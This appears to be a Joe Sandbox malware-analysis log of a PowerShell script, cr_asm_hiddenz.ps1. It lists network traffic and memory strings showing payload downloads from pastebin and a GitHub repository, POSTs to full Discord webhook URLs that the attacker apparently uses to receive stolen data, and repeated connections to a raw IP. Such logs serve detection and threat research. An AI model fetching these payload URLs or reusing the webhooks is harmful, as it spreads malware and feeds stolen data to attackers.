              Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49725 -> 104.20.3.235:443
              Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-CaU9vyM9tnzyvVTAKfrFOSG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 214Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 295Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 295Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: unknownTCP traffic detected without corresponding DNS query: 45.144.31.105
              Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/zNCj2Utm HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/6db99fAK HTTP/1.1Host: pastebin.com
              Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: pastebin.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-CaU9vyM9tnzyvVTAKfrFOSG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 214Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 13:54:04 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000445x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEtpHLoB0j6E8hurvYYTiMNQi%2B1fg6KkcpNeYpMpChEZslaumo84f8Lhcx3Us24g0K%2FRZBvyo6eEiRTtgxjXH0nXZS4yEyuQu5qjpmYFI2D7qD2BAp%2F30LUjGjim"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=e5481effafbe83c674b6e60947d49a354db44d76-1729000444; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=O2791xR3gowCquLJm3YPQJlFHPawLttdxQ93ZxTPnIA-1729000444058-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304c862a3a2e79-DFW{"message": "Unknown Webhook", "code": 10015}
              Source: powershell.exe, 0000000D.00000002.2817477632.000001E877C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microW
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9AB67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
              Source: powershell.exe, 0000000A.00000002.2086833064.000002732873A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
              Source: powershell.exe, 0000000A.00000002.2086833064.000002732873A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ctain
              Source: powershell.exe, 00000001.00000002.1922208784.0000020AAA6A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AF28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AC54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AF0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86082B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E860856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
              Source: powershell.exe, 00000014.00000002.2161624477.0000018880508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AFA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AFD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
              Source: powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F7A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A545000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880084000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1927649993.0000020AB2720000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2130172038.0000027342761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discor
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discord.com/
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A50C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A4F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.000001888005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.000001888004A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732B06C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880B8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
              Source: powershell.exe, 00000014.00000002.2161624477.0000018880B8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9AB62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9A715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9AB67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp, cr_asm_hiddenz.ps1String found in binary or memory: https://discord.com/api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-Ca
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9B58C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A9BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.1922208784.0000020AAA6A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86082B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86081F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/6db99fAK
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AF0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E86081F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/zNCj2Utm
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86081F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/zNCj2Utm8e
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AFD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F8B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
              Source: powershell.exe, 00000001.00000002.1897623908.0000020A9A715000.00000004.00000800.00020000.00000000.sdmp, cr_asm_hiddenz.ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll
              Source: powershell.exe, 0000000A.00000002.2088268444.000002732AF4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AF28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F8B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
